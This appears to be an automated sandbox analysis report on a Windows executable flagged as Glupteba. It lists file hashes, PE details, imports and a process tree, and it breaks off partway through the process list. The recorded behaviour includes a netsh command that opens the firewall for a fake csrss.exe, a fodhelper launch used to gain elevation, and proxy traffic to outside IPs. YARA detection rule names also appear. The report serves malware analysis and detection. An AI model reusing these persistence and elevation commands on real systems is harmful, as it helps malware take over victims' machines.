                                                          Preview:MAIN : 2023/05/28 11:34:17 main.go:129: INFO opera-proxy client version v1.2.2 is starting....MAIN : 2023/05/28 11:34:18 main.go:284: INFO Endpoint: 77.111.247.137:443.MAIN : 2023/05/28 11:34:18 main.go:285: INFO Starting proxy server....MAIN : 2023/05/28 11:34:18 main.go:287: INFO Init complete..PROXY : 2023/05/28 11:34:18 handler.go:92: INFO Request: 127.0.0.1:50012 HTTP/1.0 CONNECT //77.68.94.106:9001.PROXY : 2023/05/28 11:34:27 handler.go:92: INFO Request: 127.0.0.1:50014 HTTP/1.0 CONNECT //161.97.67.106:443.
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.97472217525508
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:kdsyitkxmS.exe
                                                          File size:4379008
                                                          MD5:01fe6ba28d82175d35665b3eb6ed8cea
                                                          SHA1:45748a6d6474f470d44e848596e0e08bce674996
                                                          SHA256:626df082c2624d9530794881921094aa100fa0a805b1544112d5a07dbe12cbc2
                                                          SHA512:e1537b4ebf7dd9cf345b0f8c0646de1df1152469151b43cc8c08370eb3c40393940598de98a11e47c9810d891942f385f7c6cb9ad4470a3c8941961b2a98247b
                                                          SSDEEP:98304:/RKU80KHe0iz3Dt6Ds6DV8G66EjKN69i5SvbFOqRrLfO2FnC86:/4e0i7Dt6XDGG/EjKN6LjxdFnC86
                                                          TLSH:BB162313A3A1BD54E9564BB39F2F92F8776EB6708F143755311DBA1B08B02B2C263B11
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.......|...c...|...c...|...c...Richb...................PE..L......a...........
                                                          Icon Hash:454549495545611d
                                                          Entrypoint:0x404e59
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x61AADEB8 [Sat Dec 4 03:21:28 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:2d9ed3462f8a74bfd1231e2e9de56b43
                                                          Signature Valid:false
                                                          Signature Issuer:CN=522a29533d3f200e2d1728300c141021081631313626321023042b113f2d26353224, PostalCode=10802, S=0b1c1115005f5c4e11160b0a090100180d1c4f170217 + S=0b1c1115494a5c17161151151d135100034653465007170e1c520b071c040f0f5216050f1244171f0b110e04061211081e0347124308570a1e0c0b19560a055b0c0b0a070b
                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                          Error Number:-2146762487
                                                           Not Before:28/05/2023 09:13:44
                                                           Not After:27/05/2024 09:13:44
                                                          Subject Chain
                                                          • CN=522a29533d3f200e2d1728300c141021081631313626321023042b113f2d26353224, PostalCode=10802, S=0b1c1115005f5c4e11160b0a090100180d1c4f170217 + S=0b1c1115494a5c17161151151d135100034653465007170e1c520b071c040f0f5216050f1244171f0b110e04061211081e0347124308570a1e0c0b19560a055b0c0b0a070b
                                                          Version:3
                                                          Thumbprint MD5:FA499CD6C5F7A74F5A748B778F305AE3
                                                          Thumbprint SHA-1:FF3C70A0D6A66705568453AA262257D22183BCA7
                                                          Thumbprint SHA-256:F96E2C83FF581F02D48E26B51B960B61592EE9B397B86A2A3A604587ABC9D0B4
                                                          Serial:10F68FF5E99D28F7644E5B17DA75165E
                                                          Instruction
                                                          call 00007F0631074B13h
                                                          jmp 00007F06310701ADh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov ecx, dword ptr [esp+04h]
                                                          test ecx, 00000003h
                                                          je 00007F0631070356h
                                                          mov al, byte ptr [ecx]
                                                          add ecx, 01h
                                                          test al, al
                                                          je 00007F0631070380h
                                                          test ecx, 00000003h
                                                          jne 00007F0631070321h
                                                          add eax, 00000000h
                                                          lea esp, dword ptr [esp+00000000h]
                                                          lea esp, dword ptr [esp+00000000h]
                                                          mov eax, dword ptr [ecx]
                                                          mov edx, 7EFEFEFFh
                                                          add edx, eax
                                                          xor eax, FFFFFFFFh
                                                          xor eax, edx
                                                          add ecx, 04h
                                                          test eax, 81010100h
                                                          je 00007F063107031Ah
                                                          mov eax, dword ptr [ecx-04h]
                                                          test al, al
                                                          je 00007F0631070364h
                                                          test ah, ah
                                                          je 00007F0631070356h
                                                          test eax, 00FF0000h
                                                          je 00007F0631070345h
                                                          test eax, FF000000h
                                                          je 00007F0631070334h
                                                          jmp 00007F06310702FFh
                                                          lea eax, dword ptr [ecx-01h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-02h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-03h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-04h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 20h
                                                          mov eax, dword ptr [ebp+08h]
                                                          push esi
                                                          push edi
                                                          push 00000008h
                                                          pop ecx
                                                          mov esi, 004012D8h
                                                          lea edi, dword ptr [ebp-20h]
                                                          rep movsd
                                                          mov dword ptr [ebp-08h], eax
                                                          mov eax, dword ptr [ebp+0Ch]
                                                          pop edi
                                                          mov dword ptr [ebp-04h], eax
                                                          pop esi
                                                          Programming Language:
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [C++] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022
                                                           Name                                 | Virtual Address | Virtual Size | Is in Section
                                                           IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                                           IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x40b828        | 0x64         | .text
                                                           IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x653000        | 0x19398      | .rsrc
                                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                                           IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x42c600        | 0xb80        | .data
                                                           IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x915000        | 0xddc        | .reloc
                                                           IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x1220          | 0x1c         | .text
                                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                                           IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x3150          | 0x40         | .text
                                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                                           IMAGE_DIRECTORY_ENTRY_IAT            | 0x1000          | 0x1d4        | .text
                                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                                                           IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
                                                           Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity     | File Type | Entropy           | Characteristics
                                                           .text  | 0x1000          | 0x40b2ea     | 0x40b400 | unknown  | unknown             | unknown   | unknown           | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                           .data  | 0x40d000        | 0x245844     | 0x1e00   | unknown  | unknown             | unknown   | unknown           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                           .rsrc  | 0x653000        | 0x2c1398     | 0x19400  | unknown  | unknown             | unknown   | unknown           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                           .reloc | 0x915000        | 0x5a16       | 0x5c00   | False    | 0.12958559782608695 | data      | 1.558620115158612 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                           Name          | RVA      | Size   | Type                                                            | Language | Country
                                                           RT_ICON       | 0x653730 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 0    |          |
                                                           RT_ICON       | 0x6545d8 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 0    |          |
                                                           RT_ICON       | 0x654e80 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0   |          |
                                                           RT_ICON       | 0x657428 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0   |          |
                                                           RT_ICON       | 0x6584d0 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 0   |          |
                                                           RT_ICON       | 0x658988 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 0    |          |
                                                           RT_ICON       | 0x659830 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 0    |          |
                                                           RT_ICON       | 0x65a0d8 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 0    |          |
                                                           RT_ICON       | 0x65a640 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0   |          |
                                                           RT_ICON       | 0x65cbe8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0   |          |
                                                           RT_ICON       | 0x65dc90 | 0x988  | Device independent bitmap graphic, 24 x 48 x 32, image size 0   |          |
                                                           RT_ICON       | 0x65e618 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 0   |          |
                                                           RT_ICON       | 0x65eae8 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 0    |          |
                                                           RT_ICON       | 0x65f990 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 0    |          |
                                                           RT_ICON       | 0x660238 | 0x6c8  | Device independent bitmap graphic, 24 x 48 x 8, image size 0    |          |
                                                           RT_ICON       | 0x660900 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 0    |          |
                                                           RT_ICON       | 0x660e68 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0   |          |
                                                           RT_ICON       | 0x663410 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0   |          |
                                                           RT_ICON       | 0x6644b8 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 0   |          |
                                                           RT_ICON       | 0x664988 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 0    |          |
                                                           RT_ICON       | 0x665830 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 0    |          |
                                                           RT_ICON       | 0x6660d8 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 0    |          |
                                                           RT_ICON       | 0x666640 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0   |          |
                                                           RT_ICON       | 0x668be8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0   |          |
                                                           RT_ICON       | 0x669c90 | 0x988  | Device independent bitmap graphic, 24 x 48 x 32, image size 0   |          |
                                                           RT_ICON       | 0x66a618 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 0   |          |
                                                           RT_STRING     | 0x66ad20 | 0x664  | data                                                            |          |
                                                           RT_STRING     | 0x66b388 | 0x59e  | data                                                            |          |
                                                           RT_STRING     | 0x66b928 | 0x29a  | data                                                            |          |
                                                           RT_STRING     | 0x66bbc8 | 0x248  | data                                                            |          |
                                                           RT_STRING     | 0x66be10 | 0x582  | data                                                            |          |
                                                           RT_GROUP_ICON | 0x66aa80 | 0x68   | data                                                            |          |
                                                           RT_GROUP_ICON | 0x658938 | 0x4c   | data                                                            |          |
                                                           RT_GROUP_ICON | 0x664920 | 0x68   | data                                                            |          |
                                                           RT_GROUP_ICON | 0x65ea80 | 0x68   | data                                                            |          |
                                                           RT_VERSION    | 0x66aae8 | 0x238  | data                                                            |          |
                                                          DLL           Import
                                                          KERNEL32.dll  GetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
                                                          USER32.dll    CharLowerBuffA
                                                          GDI32.dll     GetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
                                                          ADVAPI32.dll  MapGenericMask
                                                          Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.


                                                          Target ID:0
                                                          Start time:11:30:14
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                          Imagebase:0x7ff769ed0000
                                                          File size:57360 bytes
                                                          MD5 hash:F586835082F632DC8D9404D83BC16316
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Target ID:4
                                                          Start time:11:30:15
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Target ID:6
                                                          Start time:11:30:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          Target ID:7
                                                          Start time:11:30:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:9
                                                          Start time:11:30:29
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\servicing\TrustedInstaller.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                          Imagebase:0x7ff795940000
                                                          File size:156488 bytes
                                                          MD5 hash:F14D860CAE05DBD10671623C76B5DE65
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          Target ID:10
                                                          Start time:11:30:29
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\kdsyitkxmS.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          Reputation:low

                                                          Target ID:11
                                                          Start time:11:30:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          Target ID:12
                                                          Start time:11:30:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:13
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                          Imagebase:0x7ff7d3a70000
                                                          File size:289792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:14
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:15
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\netsh.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                          Imagebase:0x7ff7bcfe0000
                                                          File size:96768 bytes
                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:16
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:17
                                                          Start time:11:30:42
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:18
                                                          Start time:11:30:53
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:19
                                                          Start time:11:30:53
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:20
                                                          Start time:11:31:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 32%, ReversingLabs

                                                          Target ID:21
                                                          Start time:11:31:06
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:22
                                                          Start time:11:31:06
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:23
                                                          Start time:11:31:13
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          Target ID:24
                                                          Start time:11:31:15
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                          Imagebase:0x7ff7d3a70000
                                                          File size:289792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:25
                                                          Start time:11:31:15
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:26
                                                          Start time:11:31:15
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:fodhelper
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:27
                                                          Start time:11:31:15
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:30
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:31
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                          Target ID:32
                                                          Start time:11:31:16
